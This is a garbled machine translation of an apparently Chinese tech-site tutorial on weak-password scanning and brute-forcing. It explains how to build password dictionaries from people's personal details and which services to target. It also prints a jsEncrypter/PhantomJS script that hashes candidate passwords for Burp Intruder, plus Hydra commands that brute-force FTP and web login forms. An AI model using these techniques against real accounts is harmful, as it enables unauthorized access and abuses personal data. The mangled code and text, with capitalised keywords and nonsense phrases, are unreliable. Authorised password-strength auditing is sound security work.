Shulou(Shulou.com)05/31 Report--

Today, the editor will share with you the relevant knowledge points of javascript weak password scanning case analysis. The content is detailed and the logic is clear. I believe most people still know too much about this knowledge, so share this article for your reference. I hope you can get something after reading this article. Let's take a look at it.

1 weak password

Recommend weak password dictionary on github

2 generate weak passwords for social work attributes

The aim is to generate passwords that meet the complexity requirements of passwords and are easy to remember.

2.1 get the account number

How to obtain a user's account:

Chinese common name Top500, common combination:

Full spelling of Pinyin + [number]

Full spelling of surname + initials of first name + [number]

Recruitment website

Social tools (pulse)

Google hacking

Work number

2.2 password fragmentation

Related to users' personal information

Name, nickname, ID, QQ

Birthday, male / girlfriend birthday, special anniversary

Mobile phone number, male / girlfriend mobile phone number

Information about parents and relatives

Company related information (domain name, email address, company phone, department, etc.)

Habit and habit

Keyboard distribution, SHIFT+ keyboard layout

Special holidays, anniversaries, years

A memorable combination of numbers, letters

A memorable combination of special characters

Words with special meanings

Alphanumeric substitution with special meaning (I-5, is-4mai 0)

2.3 combination mode

It is best for the inspected party to provide a list of frequently used default passwords. Here are some other combinations:

There are social worker passwords that can be used to generate combinations of historical records based on previous passwords.

The password usage habits of the department tend to be consistent.

Meaningful characters @ meaningful numbers, such as name spelling @ 2017.

The following picture can be referred to.

2.4 Dictionary Generation tool Bailu Social worker Dictionary Generator

GenpAss

3 weak password related services

All services that may have unauthorized access classes

Remote maintenance services (SSH, Tenlent, RDP, etc.)

Database services (MySQL, MSSQL, Oracle, ES, MongoDB, etc.)

Caching services (Redis, Kafka)

Big data related services

All kinds of interfaces in cloud environment and Docker environment

A variety of Web applications, mobile programs, Mini Program and so on.

4 blasting tools 4.1 Burp Intruder

Use the example

Steps:

Try to log in, use the browser debug mode to find the js file where the encrypted function is located, and usually select the login element in debug mode to search for the information of the function used

Find the final encrypted js file by checking the derivation invocation relationship.

Download the encrypted js file locally

Use jsEncrypter's js template to load encryption functions used

Use phantomjs to load the js template of jsEncrypter

Use Burp's jsEncrypter extension to connect to services enabled by phantomjs

Test the encryption effect

Using the payload processing function of Burp Intruder, the plaintext password is processed by loading jsEncrypter and then burst.

Basic js script

/ * *

* author: c0ny1

* date: 2017-12-16

* last update: 2019-5-30 11:16

, /

Var fs = require ('fs')

Var logfile = 'jsEncrypter.log'

Var webserver = require ('webserver')

Server = webserver.create ()

Var host = '127.0.0.1'

Var port = '1664'

/ / load the js script that implements the encryption algorithm

Var wasSuccessful = phantom.injectJs ('md5.js'); / * introduce js files for encryption * /

/ / processing function

Function js_encrypt (payload) {

Var newpayload

/ * write the code that calls the encryption function to encrypt here * /

Var newpayload = hex_md5 (payload) + "djmis"

/ * /

Return newpayload

}

If (wasSuccessful) {

Console.log ("[*] load js successful")

Console.log ("[!] ^ _ ^")

Console.log ("[*] jsEncrypterJS start!")

Console.log ("[+] address: http://"+host+":"+port);

} else {

Console.log ('[*] load js failure')

}

Var service = server.listen (host+':'+port,function (request, response) {

Try {

If (request.method = = 'POST') {

Var payload = request.post ['payload']

Var encrypt_payload = js_encrypt (payload)

Var log = payload +':'+ encrypt_payload

Console.log ('[+]'+ log)

Fs.write (logfile,log +'\ n', 'wicked')

Response.statusCode = 200

Response.write (encrypt_payload.toString ())

Response.close ()

} else {

Response.statusCode = 200

Response.write ("^ _ ^\ n\ rhello jsEncrypter!")

Response.close ()

}

} catch (e) {

/ / console.log ('[Error]'+ e.messageboxes' happen'+ e.linewise updated linelines')

Console.log ('\ n-Error Info-')

Var fullMessage = "Message:" + e.toString () +':'+ e.line

For (var p in e) {

FullMessage + = "\ n" + p.toUpperCase () + ":" + e [p]

}

Console.log (fullMessage)

Console.log ('-')

Console.log ('[*] phantomJS exitration')

Phantom.exit ()

}

});

Effect.

4.2 Hydra

Use-h to get help and provide several usage examples

Hydra-l admin-p password ftp://localhost/

Hydra-L default_logins.txt-p test ftp://localhost/

Hydra-l admin-P common_passwords.txt ftp://localhost/

Hydra-L logins.txt-P passwords.txt ftp://localhost/

Hydra blasting HTTP request

Hydra-l admin-p password 192.168.43.131 http-post-form "/ login.php:username= ^ user ^ & password= ^ pass ^ & Login=Login:F=Username and/or password incorrect." 4.3 Super weak password checking tool

Graphical interface

These are all the contents of the article "javascript weak password scanning example Analysis". Thank you for reading! I believe you will gain a lot after reading this article. The editor will update different knowledge for you every day. If you want to learn more knowledge, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.